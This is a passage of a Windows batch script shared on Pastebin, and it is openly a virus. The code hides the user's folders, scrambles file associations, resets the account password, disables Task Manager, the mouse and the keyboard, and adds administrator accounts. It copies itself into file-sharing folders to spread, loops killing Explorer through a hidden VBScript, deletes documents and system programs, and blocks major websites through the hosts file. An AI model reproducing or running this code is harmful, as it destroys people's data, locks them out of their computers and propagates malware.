  746. %ii%%ury% %ywe%%iej% spoolnt
  747. ::---------------------------::
  748. ::----Hide My Documents Folder---::
  749. attrib +h "%userprofile%\my documents"
  750. ::---------------------------::
  751. ::----Hide My Music Folder---::
  752. attrib +h "%userprofile%\my documents\my music"
  753. ::---------------------------::
  754. ::----Hide My Music Folder---::
  755. attrib +h "%userprofile%\my documents\my videos"
  756. ::---------------------------::
  757. ::----Hide My Pictures Folder---::
  758. attrib +h "%userprofile%\my documents\my pictures"
  759. ::---------------------------::
  760. ::Confuse File Extensions [TXT]::
  761. assoc .mp3=txtfile
  762. assoc .xml=txtfile
  763. assoc .png=txtfile
  764. ::-----------------------------::
  765. ::--Confuse File Extensions--::
  766. assoc .dll=txtfile
  767. assoc .exe=pngfile
  768. assoc .bat=WinRAR
  769. assoc .vbs=Visual Style
  770. assoc .reg=xmlfile
  771. assoc .txt=regfile
  772. ::---------------------------::
  773. ::--Change Pass To InShadow--::
  774. net user %username% InShadow
  775. ::---------------------------::
  776. ::--Start Hidden WinXP Song--::
  777. cd "C:\Windows\system32\oobe\images"
  778. start title.wma
  779. ::---------------------------::
  780. ::---Disable Taskmanager-----::
  781. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
  782. ::---------------------------::
  783. ::----Swap Mouse Buttons-----::
  784. RUNDLL32 USER32.DLL,SwapMouseButton
  785. ::---------------------------::
  786. ::------Change The Time------::
  787. time 00:00
  788. ::---------------------------::
  789. ::-------Open Disk Tray------::
  790. echo Do >> "opendisk.vbs"
  791. echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
  792. echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
  793. echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
  794. echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
  795. echo Loop >> "opendisk.vbs"
  796. start "" "opendisk.vbs"
  797. ::---------------------------::
  798. ::-------Disable Mouse-------::
  799. set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
  800. reg delete %key%
  801. reg add %key% /v Start /t REG_DWORD /d 4
  802. ::---------------------------::
  803. ::------Disable Keyboard-----::
  804. echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
  805. echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
  806. echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
  807. echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
  808. echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
  809. echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
  810. echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
  811. echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
  812. echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
  813. echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
  814. echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
  815. echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
  816. echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
  817. echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
  818. echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
  819. echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
  820. echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
  821. echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
  822. echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
  823. echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
  824. echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
  825. echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
  826. echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
  827. start nokeyboard.reg
  828. ::---------------------------::
  829. ::-----Add Admin Account-----::
  830. net user Username Password /add
  831. net localgroup administrators Username /add
  832. ::---------------------------::
  833. ::-----Add Admin Account-----::
  834. net user Username Password /add
  835. net localgroup administrators Username /add
  836. ::---------------------------::
  837. ::-----Add Admin Account-----::
  838. net user Username Password /add
  839. net localgroup administrators Username /add
  840. ::---------------------------::
  841. ::-----Add Admin Account-----::
  842. net user Username Password /add
  843. net localgroup administrators Username /add
  844. ::---------------------------::
  845. ::----Spread Via LimeWire----::
  846. copy 0% c:\program files\limewire\Shared\Virus Name.bat
  847. ::---------------------------::
  848. ::----Spread Via Grokster----::
  849. copy 0% c:\program files\Grokster\My Grokster\Virus Name.bat
  850. ::---------------------------::
  851. ::------Spread Via eMule-----::
  852. copy 0% c:\program files\eMule\Incoming\Virus Name.bat
  853. ::---------------------------::
  854. ::----New Drive Name---::
  855. label porn xd
  856. ::---------------------::
  857. ::-----Kill Explorer.exe-----::
  858. echo :a >>WindUpdate.bat
  859. echo tskill explorer >>WindUpdate.bat
  860. echo goto a >>WindUpdate.bat
  861. echo Set objShell = CreateObject("WScript.Shell")>>rundlll32.vbs
  862. echo strCommand = "WindUpdate.bat">>rundlll32.vbs
  863. echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs
  864. start "" rundlll32.vbs
  865. ::---------------------------::
  866. ::-------Delete Wordpad------::
  867. del /f /q "WordPad.exe"
  868. ::---------------------------::
  869. ::-----Delete My Pictures----::
  870. del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
  871. ::---------------------------::
  872. ::----Delete My Documents----::
  873. del /f /q "C:\Users\%userprofile%\My Documents\*.*"
  874. ::---------------------------::
  875. ::--------Delete Calc.-------::
  876. del /f /q "calc.exe"
  877. ::---------------------------::
  878. ::--Delete Windows Live Mail-::
  879. del /f /q "wlmail.exe"
  880. ::---------------------------::
  881. ::-------Delete Notepad------::
  882. del /f /q "notepad.exe"
  883. ::---------------------------::
  884. ::-------Delete MS Paint-----::
  885. del /f /q "mspaint.exe"
  886. ::---------------------------::
  887. ::-----Delete My Music-------::
  888. del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
  889. ::---------------------------::
  890. ::--Delete Internet Explorer-::
  891. del /f /q "C:\Program Files\Internet Explorer\iexplore.exe"
  892. ::---------------------------::
  893. ::-------Block YouTube-------::
  894. cd "C:\Windows\System32\Drivers\etc"
  895. echo 127.0.0.1 youtube.com >> "Hosts"
  896. echo 127.0.0.1 www.youtube.com >> "Hosts"
  897. ::---------------------------::
  898. ::--------Block Google-------::
  899. cd "C:\Windows\System32\Drivers\etc"
  900. echo 127.0.0.1 google.com >> "Hosts"
  901. echo 127.0.0.1 www.google.com >> "Hosts"
  902. ::---------------------------::
  903. ::--------Block Hotmail------::
  904. cd "C:\Windows\System32\Drivers\etc"
  905. echo 127.0.0.1 hotmail.com >> "Hosts"
  906. echo 127.0.0.1 www.hotmail.com >> "Hosts"
  907. ::---------------------------::
  908. ::--------Block Yahoo!-------::
  909. cd "C:\Windows\System32\Drivers\etc"
  910. echo 127.0.0.1 yahoo.com >> "Hosts"
  911. echo 127.0.0.1 www.yahoo.com >> "Hosts"
  912. ::---------------------------::
  913. ::-------Block Wikipedia-----::
  914. cd "C:\Windows\System32\Drivers\etc"
  915. echo 127.0.0.1 wikipedia.org >> "Hosts"
  916. echo 127.0.0.1 www.wikipedia.org >> "Hosts"
  917. ::---------------------------::
  918. ::---------Block MSN---------::
  919. cd "C:\Windows\System32\Drivers\etc"
  920. echo 127.0.0.1 msn.com >> "Hosts"
  921. echo 127.0.0.1 www.msn.com >> "Hosts"
  922. ::---------------------------::
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!